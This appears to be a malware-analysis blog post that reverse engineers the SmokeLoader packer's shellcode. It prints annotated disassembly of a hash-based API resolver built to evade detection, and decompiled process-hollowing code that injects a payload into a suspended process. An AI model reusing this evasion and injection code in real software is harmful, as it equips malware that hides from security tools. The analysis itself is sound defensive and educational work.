SmokeLoader ShellCode Analysis
Introduction
Hello Geeks, today I am going to dive deep into the shellcode used by Smokeloader in the unpacking process, the shell code is not too hard to understand and also has some challenges, I used some blogs for dealing with some structures so let’s do it…..
Overview
smoke loader is one of the most loaders used these days due to its efficiency in some techniques like
- anti sandboxing
- anti-debugging
- AV Evasion
- Process Injection
- Anti Hooking
I will not analyze the sample in this blog, I will just analyze the code used in the unpacking process cause I think all malwares nowadays is packed and we need to understand how the unpacking process is done at the assembly level
FirstLook -_-
I have used an old sample cause u can find it easily with the SHA-1 hash “72FC3CE96BD9406215CEC015D70BBB67318F1E23”
I have found that the sample is flagged by 60 AV in Virustotal and also it used some functions not used many in the Malicious operation so that gives us an indicator of packing, but I will test it against PEID and look at the entropy of the sections .
big difference in raw and virtual size — figure 01
and here is how the entropy looks like in PEID which also gives a big indicator of packing
CODE Analysis
I will use IDA to dissemble the code, after some moves in the code tab and between functions I have discovered that the sample use many of junk code just to make the analysis operation harder, and when dealing with packed samples there is some API that we need to pay it our attention
- VirtualAlloc
- GlobalAlloc
- LocalAlloc
- VirtualAllocEx
so in sub_4019B0() there are two calls for LocalAlloc() API, one of them does nothing, and another one is called with argument dwsize
first call for local alloc figure 02
the function Missed_() at 0x0401E9F which does some changes for dwSize Global Var
So we need to trace the allocated space to get the data that will be written there, so in the next figure there is a data moving process using Pointers
Write data into the allocated Address — figure 03
so this block of code will write the content from (dword_45CF0C + k +0x8F176) ‘k’ here used as a counter, so we need to know what is the value in dword_45CF0C to know from where the data is copied,
before the loop, there is another some moving that’s may we pay attention
dword_45F0C = dword_448A84
after I checked the value in dword_448A84 it have initial value = 0x39AAA2
if we solve the equation above so the result will be like this
0x39AAA2 + 0x8F176 = 0x00429C18 → ShellCode Address
figure 04
so if we tried to jump for the resolved address 0x0429C18 that’s what I have found
figure 05
in sub_403206(int &lpaddress , SIZE_T &dwsize) there is another call for LocalAlloc API,
figure 06
and if we take a look at the end of this function there is a change in the lpaddress → shellcode address, so what I have extracted from this function is that, the function writes the code section of the shell code because what we seen above in figure 05 is not the real shellcode it’s just the data which will be used by the shellcode for payload injection
Change Protection and Transfer Execution
figure 07
so here is the packer will change the protection of the allocated memory where the shellcode have been written with 0x40 as protection
0x40 → PAGE_EXECUTE_READWRITE
and after that there is a call for the lpAddress → start of the shellcode ,so I will use the debugger for the next steps to extract the shellcode and also reverse it
Apply decryption for ShellCode
I know that you get confused but this may help you in your next unpacking process and change your mind about the unpacking and how to deal with it
we see a call to 0x404B83 at 0x401BAD address , I have renamed the function to mw_w_apply_decryption to express it’s behavior , the function takes 3 argument
push offset unk_448000
push dwSize
push lpAddress
call mw_apply_decryption
the unk_448000 contain some data we need to observe
inside mw_w_apply_decryption there a call for 0x404934 which I have renamed apply_decryption
for ( i = 0; i < dwsize / 8; ++i )
{
if ( dwSize == 4445 )
VerifyVersionInfoW(&VersionInformation, 0, 0i64);
result = apply_decryption(lpaddress + 8 * i, unk__);
}
so we need to dive into this function and know where is the decryption part , and I see some XOR operation and also some bit shifting operation, I am really not interested in the decryption mechanism I just want to know what this function applies for the shellcode
figure 08
Advanced Dynamic Analysis
here is the first call for localAlloc() API ,
figure 09
We’ll keep our eyes on the allocated space ,
figure 10
here is we got the shellcode written in the allocated space, and as I said before ,at the end of this function there is a changing in lpaddress
mov dword ptr ds:[eax],edi
eax --> lpaddress
edi --> the address of the shellcode
figure 11
and here is the decryption part I explained above and also execution transfer
figure 12
and here is the start of the shellcode
figure 13
so I will dump this shellcode and try to analyze it with some tricks and using some structures, I will use IDA for the next analysis
after cleaning dumped memory and mapping addresses, here is the start of the shellcode .
the start of Shellcode- figure 14
inside sub_630, the shellcode uses stack string for evade detection by Security Solutions , but before this string resolving there is a call for sub_010 at address 0x647 which I have renamed sh_w_GetAPIAddr, let’s explore it to know why this name,
sh_w_GetAPI_Addr — figure 15
inside sub_0110 there another call for sub_042 I have renamed to sh_GetAPIAddr with 2 argument
call for API hashing resolve figure-16
ptr_loadlibrary = sh_GetAPIAddr(0xD4E88, 0xD5786);// get kerenl32_address and LoadLibrary address
ptr_GetProcAddr = sh_GetAPIAddr(0xD4E88, 0x348BFA);// get ProcAddress API addr
and the operation is that they pass a hash of dll name and API name also, and inside this function there is some playing with PEB structures and built-in modules, and the trick here is that all the Malware that Run_Time API resolving for evade detection and also making analysis harder, so I will dive inside this call to know how this operation is done and after that, I will learn you something makes passing this trick is so easy, let’s dive deep into sub_042 and know to this hashes is resolved to API address
I will write the code used for the method here and not use figures to make it easier tracing,and also I have commented on every assembly line for those who know how to deal with assembly -_-
seg000:00000042 sh_GetAPIAddr proc near
seg000:00000042
seg000:00000042 hash_Kerenl32 = dword ptr 8
seg000:00000042 hash_loadlibrary= dword ptr 0Ch
seg000:00000042
seg000:00000042 push ebp
seg000:00000043 mov ebp, esp
seg000:00000045 push ebx
seg000:00000046 push esi
seg000:00000047 push edi
seg000:00000048 push ecx
seg000:00000049 push dword ptr fs:loc_30 ; push PEB
seg000:00000050 pop eax ; eax --> [30] --> PEB
seg000:00000051 mov eax, [eax+0Ch] ; eax --> LoaderData
seg000:00000054 mov ecx, [eax+0Ch] ; ecx --> InloadOrderModuleList
seg000:00000057
seg000:00000057 loc_57:
seg000:00000057 mov edx, [ecx] ; edx --> address of the frist loaded Module
seg000:00000059 mov eax, [ecx+30h] ; eax --> BaseDllName
seg000:0000005C push 2 ; a3
seg000:0000005E mov edi, [ebp+hash_Kerenl32]
seg000:00000061 push edi ; edi --> Kerenl32_Hash
seg000:00000062 push eax ; loadedDllName
seg000:00000063 call hash_and_compare
seg000:00000068 test eax, eax
seg000:0000006A jz short loc_70 ; jump if eax = 0 --> comparesion successeded
seg000:0000006C mov ecx, edx
seg000:0000006E jmp short loc_57 ; edx --> address of the frist loaded Module
seg000:00000070 ; ---------------------------------------------------------------------------
seg000:00000070
seg000:00000070 loc_70:
seg000:00000070 mov eax, [ecx+18h] ; ecx --> InLoadOrderModuleList
seg000:00000070 ; eax = [ecx+0x18] --> DllBaseAddress
seg000:00000073 push eax ; push BaseAddress of Dll
seg000:00000074 mov ebx, [eax+3Ch] ; ebx --> elfanew (start of optional header)
seg000:00000077 add eax, ebx ; eax = baseaddress + elfanew
seg000:00000079 mov ebx, [eax+78h] ; ebx --> Data Directories[Export_Table]
seg000:0000007C pop eax ; pop eax --> eax = DllBaseAddress
seg000:0000007D push eax ; push DllBaseAddress
seg000:0000007E add ebx, eax ; ebx = Export_Table + DllBaseAddress
seg000:00000080 mov ecx, [ebx+1Ch] ; ecx = [ebx+1Ch] --> AddressOfFunctions
seg000:00000083 mov edx, [ebx+20h] ; edx = [ebx+1Ch] --> AddressOfNames
seg000:00000086 mov ebx, [ebx+24h] ; ebx = [ebx+24h] --> AddressOfNameOrdinals
seg000:00000089 add ecx, eax ; ecx = AddressOfFunction + DllBaseAddress
seg000:0000008B add edx, eax ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D add ebx, eax ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F
seg000:0000008F loc_8F:
seg000:0000008F mov esi, [edx]
seg000:00000091 pop eax
seg000:00000092 push eax ; eax --> DllBaseAddress
seg000:00000093 add esi, eax ; esi = [esi+eax] --> ApiName
seg000:00000095 push 1 ; a3
seg000:00000097 push [ebp+hash_loadlibrary] ; hash_kerenl32
seg000:0000009A push esi ; loadedDllName
seg000:0000009B call hash_and_compare
seg000:000000A0 test eax, eax
seg000:000000A2 jz short loc_AC ;
seg000:000000A2 ; eax --> DllBaseAddress
seg000:000000A4 add edx, 4
seg000:000000A7 add ebx, 2
seg000:000000AA jmp short loc_8F
seg000:000000AC ; ---------------------------------------------------------------------------
seg000:000000AC
seg000:000000AC loc_AC:
seg000:000000AC pop eax ;
seg000:000000AC ; eax --> DllBaseAddress
seg000:000000AD xor edx, edx ; edx = 0
seg000:000000AF mov dx, [ebx] ; dx = [ebx] --> Ordinal of resolved API
seg000:000000B2 shl edx, 2 ; edx * 4
seg000:000000B5 add ecx, edx ; ecx = AddressOfFunction + (edx*4)
seg000:000000B7 add eax, [ecx] ; eax = DllBaseAddress + ecx
seg000:000000B7 ; eax --> API_Address
seg000:000000B9 pop ecx
seg000:000000BA pop edi
seg000:000000BB pop esi
seg000:000000BC pop ebx
seg000:000000BD mov esp, ebp
seg000:000000BF pop ebp
seg000:000000C0 retn 8
seg000:000000C0 sh_GetAPIAddr endp
seg000:000000C0
so keep your eyes at this code fro some seconds, I tried to make comments easy to understand and also I will explain it line by line
at address 0x_49 the sample gets PEB Structure (process envinronment Block) reside in loc_30 which contains some data about the current process like modules loaded ,also this data is used by the loader
seg000:00000049 push dword ptr fs:loc_30 ; push PEB
seg000:00000051 mov eax, [eax+0Ch] ; eax --> LoaderData
here it gets the address of LoaderData by adding 0xc to eax
which contain PEB address
here is how loader data structure is
struct _PEB_LDR_DATA { //loader data Structure
DWORD Length_; //+00
DWORD Initialized; //+04
DWORD SsHandle; //+08
__LIST_ENTRY InLoadOrderModuleList; //+0C
__LIST_ENTRY InMemoryOrderModuleList; //+14
__LIST_ENTRY InInitializationOrderModuleList; //+1C
DWORD EntryInProgress; //+24
DWORD ShutdownInProgress; //+28
DWORD ShutdownThreadId; //+2C
};
seg000:00000054 mov ecx, [eax+0Ch] ; ecx –> InloadOrderModuleList
so adding 0xc to eax which contain loaderdata will give us the Address of
InLoadOrderModuleList which is a linkedlist of loaded modules and every node is
a structre.
and here is how this structure looks like
struct _LDR_DATA_TABLE_ENTRY{
__LIST_ENTRY InLoadOrderLinks; //+00
__LIST_ENTRY InMemoryOrderLinks; //+08
__LIST_ENTRY InInitializationOrderLinks; //+10
DWORD DllBase; //+18
DWORD EntryPoint; //+1C
DWORD SizeOfImage; //+20
DWORD FullDllNameLength; //+24
char* FullDllName; // _UNICODE_STRING //+28
DWORD BaseDllNameLength; //+2C
char* BaseDllName; //_UNICODE_STRING //+30
DWORD Flags; //+34
short LoadCount; //+38
short TlsIndex; //+3C
union{
__LIST_ENTRY HashLinks;
DWORD SectionPointer;
};
DWORD CheckSum;
union{
DWORD TimeDateStamp;
DWORD LoadedImports;
};
DWORD EntryPointActivationContext;
DWORD PatchInformation;
__LIST_ENTRY ForwarderLinks;
__LIST_ENTRY ServiceTagLinks;
__LIST_ENTRY StaticLinks;
};
so the next assmebly line
is getting the first module :
seg000:00000057 mov edx, [ecx] ; edx –> address of the frist loaded Module
after that it get Name
of the dll loaded by adding 0x30
to ModuleBase address
seg000:00000059 mov eax, [ecx+30h] ; eax –> BaseDllName
after getting DLL name and saving a pointer to it into eax register
eax → points to Dll Name
the shellcode will have a call to sub_0C3 I have renamed to hash_and_Compare
Hash_and_Comare call — figure 17
this function takes 3 argument
1- value 2
2- precalculated hash to compare with — explore figure 16
3- Dll name resolved before
so I will try to analyze this function and know how hash algorithm works .
inside sub_c3 :
this line move Dll passed name pointer to eax
seg000:000000CF mov eax, [ebp+arg_Dll_Name] ; eax –> DLL Name
then it will create a loop to iterate over full Dll name
hashing loop — figure 18
and the Algorithm here is very simple and we can summarize it in some steps
1- get the lowercase of the char, A → a
2- add this char for the previous hash
3-shift-left of the result of step2 with 1 or multiplay with 2 ( shl ebx,1)
4- check if we reached the end of the name by checking null treminator
so after calculating the hash of DLL name it’s time for comparing the hash against the pre-calculated hash , and if the comparison failed this function will return 1 and If the camparison successeded it will return 0
figure 19
so If the comparison succeeded it will then try to resolve the API address using similar method using Export Table of the resolved Dll, I will give the code of this part
seg000:00000070 loc_70: ; ecx --> InLoadOrderModuleList
seg000:00000070 mov eax, [ecx+18h] ; ecx --> InLoadOrderModuleList
seg000:00000070 ; eax = [ecx+0x18] --> DllBaseAddress
seg000:00000073 push eax ; push BaseAddress of Dll
seg000:00000074 mov ebx, [eax+3Ch] ; ebx --> elfanew (start of optional header)
seg000:00000077 add eax, ebx ; eax = baseaddress + elfanew
seg000:00000079 mov ebx, [eax+78h] ; ebx --> Data Directories[Export_Table]
seg000:0000007C pop eax ; pop eax --> eax = DllBaseAddress
seg000:0000007D push eax ; push DllBaseAddress
seg000:0000007E add ebx, eax ; ebx = Export_Table + DllBaseAddress
seg000:00000080 mov ecx, [ebx+1Ch] ; ecx = [ebx+1Ch] --> AddressOfFunctions
seg000:00000083 mov edx, [ebx+20h] ; edx = [ebx+1Ch] --> AddressOfNames
seg000:00000086 mov ebx, [ebx+24h] ; ebx = [ebx+24h] --> AddressOfNameOrdinals
seg000:00000089 add ecx, eax ; ecx = AddressOfFunction + DllBaseAddress
seg000:0000008B add edx, eax ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D add ebx, eax ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F
do u remember when i talked about Modulel linked list
so in line 0x0070 [ecx+18] will points to DllBaseAddress structure member
and this base address is address of this Dll in memroy
after that in line 0x0074 will add 0x3C to baseaddress and that will get
address of elfa_new –> points to the start of the optional header
in line 0x0079 it will 0x78 to eax which the RVA of Optional header start
so ebx –> points to Export_Table which is a structe of API information
like
-name
-address
-ordinal number
from line 0x0080 to 0x0086 it will resolve the address where this data is
ecx --> address of function
edx --> address of Names
ebx --> address of NameOrdinal
and here is the structure :
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics; // 0x0
DWORD TimeDateStamp; // 0x4
WORD MajorVersion; // 0x8
WORD MinorVersion; // 0xA
DWORD Name; // 0xC
DWORD Base; // 0x10
DWORD NumberOfFunctions; // 0x14
DWORD NumberOfNames; // 0x18
DWORD AddressOfFunctions; // 0x1C
DWORD AddressOfNames; // 0x20
DWORD AddressOfNameOrdinals; // 0x24
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
if you got confused about the above code and structures, this graph from Corkami project may help you click here
retrieve API Name
after playing with structures the shellcode will try to get API name and hash it with the same operation used before with DLL name
hash API name — figure 20
here it will push 3 arguments
- API Name
- a3 → to get the null terminator cause it unicode string
- pre-calculated hash of API to compare with
so If the comparison sucesseded the shell code will try to resolve the address of The API using the same structure of Export Table
figure 20
and at the end of this function the Resolved API address will be saved in eax register .
I know you may miss many things due to my bad explanation but I am not that guy who is powerful in teaching people hard things.
so I will learn you how to deal with API hashing and let IDA do this job for you
first, u need to install hashdb plugin form Oalabs
so after u installed this plugin u need to come across the passed hash and right-click on it,
u will find something like hashdb Hunt Algorth
figure 21
after clicking on it, u need to wait for 15s and your output will be like this
hashdb output — figure 22
Choose the algorithm may give u a different result so if u are good with Call Argument u will know how to deal with this.
after that u will find a local type created in your LocalTypes tab with the name of the algorithm chosen before
local types — figure 23
so u come over your code and put cruser in the function and convert its argument type by clicking hot key ‘y’, and u will find this output on your screen
function argument type -figure 23
so u need to change the argument type from :
int → *algorithm name
so in my case, it will be like this
figure 24
and after that IDA will change this hashes to itss eqlevent API Name like this
Dynamic Api Resolving — figure 25
Building IAT (import address table)
after that in sub_630 it will resolve needed API addresses and build its API table, so after some reversing I created a structure for the resolved API Names to know what API is called inside another function
building IAT — figure 26
and here is how this structure looks like
struct API_IAT
{
int ptr_LoadLibrary;
int ptr_GetProcAddr;
char var_D8;
int buffer;
int user32_hModule;
int MessageBoxA_api;
int GetMessageExtraInfo_api;
int kernel32_hModule;
int WinExec_api;
int CreateFileA_api;
int WriteFile_api;
int CloseHandle_api;
int CreateProcessA_api;
int GetThreadContext_api;
int VirtualAlloc_api;
int VirtualAllocExw_api;
int VirtualFree_api;
int ReadProcessMemory_api;
int WriteProcessMemory_api;
int SetThreadContext_api;
int ResumeThread_api;
int WaitForSingleObject_api;
int GetModuleFileNameA_api;
int GetCommandLineA_api;
int RegisterClassExA_api;
int CreateWindowExA_api;
int PostMessageA_api;
int GetMessageA_api;
int DefWindowProcA_api;
int GetFileAttributesA_api;
int ntdlldll_hModule;
int NtUnmapViewOfSection_api;
int NtWriteVirtualMemory_api;
int GetStartupInfoA_api;
int VirtualProtectEx_api;
int ExitProcess_api;
};
at the end of sub_630 you will find the member [API_IAT.buffer] is being assigned with 0x15A0 value and there is a call to sub_5B0 with our structure as argument
figure 27
so when I jumped to address 0x15A0 I found the payload which will be dropped by this shellcode, which refers to a PE File
Pe File - figure 28
inside sub_110 there is an injection operation is done specially process hollowing, I will not explain how process hollowing is done cause I did this before in another article that explains process hollowing line by line, you can check it here.
and here is the code used for this operation
v19 = 2;
buffer = IAT_Struct->buffer; // buffer = 0x15A0
ptr_optionalHeader = *(buffer + 0x3C) + IAT_Struct->buffer;// get elfanew --> start of optionalheader
ptr_memory = (IAT_Struct->VirtualAlloc_api)(0, 10240, 4096, 4);
result = (IAT_Struct->GetModuleFileNameA_api)(0, ptr_memory, 10240);
if ( *ptr_optionalHeader == 'EP' ) // 'PE'
{
v15 = 0;
v16 = 0;
hProcess = 0;
v14 = 0;
memset(v3, 0, sizeof(v3));
v5 = 0;
v9 = 0;
v7 = 0;
v8 = 0;
v6 = 0;
v4 = 0;
(IAT_Struct->GetStartupInfoA_api)(v3);
commandLine_ = (IAT_Struct->GetCommandLineA_api)(0, 0, 0, 0x8000004, 0, 0, v3, &hProcess);
result = (IAT_Struct->CreateProcessA_api)(ptr_memory, commandLine_);
if ( result ) // if successed the output is nonzero
//
{
(IAT_Struct->VirtualFree_api)(ptr_memory, 0, 0x8000);
ptr_memory_1 = (IAT_Struct->VirtualAlloc_api)(0, 4, 4096, 4);
*ptr_memory_1 = 65543;
result = (IAT_Struct->GetThreadContext_api)(v14, ptr_memory_1);
if ( result )
{
(IAT_Struct->ReadProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, &base_address, 4, 0);
if ( base_address == *(ptr_optionalHeader + 0x34) )
(IAT_Struct->NtUnmapViewOfSection_api)(hProcess, base_address);
v11 = (IAT_Struct->VirtualAllocExw_api)(
hProcess,
*(ptr_optionalHeader + 52),
*(ptr_optionalHeader + 80),
12288,
64);
(IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v11, IAT_Struct->buffer, *(ptr_optionalHeader + 84), 0);
for ( i = 0; i < *(ptr_optionalHeader + 6); ++i )
{
v17 = (*(buffer + 60) + IAT_Struct->buffer + 40 * i + 248);
(IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v17[3] + v11, v17[5] + IAT_Struct->buffer, v17[4], 0);
}
(IAT_Struct->WriteProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, ptr_optionalHeader + 52, 4, 0);
ptr_memory_1[44] = *(ptr_optionalHeader + 40) + v11;
(IAT_Struct->SetThreadContext_api)(v14, ptr_memory_1);
(IAT_Struct->ResumeThread_api)(v14);
(IAT_Struct->CloseHandle_api)(v14);
(IAT_Struct->CloseHandle_api)(hProcess);
return (IAT_Struct->ExitProcess_api)(0);
}
}
}
return result;
}
so if we wanna summarize what this shellcode does it will be :
- build IAT using runtime API resolving
- run the parent process but in suspended state
- unmap parent code from memory
- map and inject the new payload which resides at 0x15A0
- resume the process with the new payload
here is the end of the article and I hope you learn something new and if there is any mistakes do not hesitate to tell me .
thanks for your time -_- ……….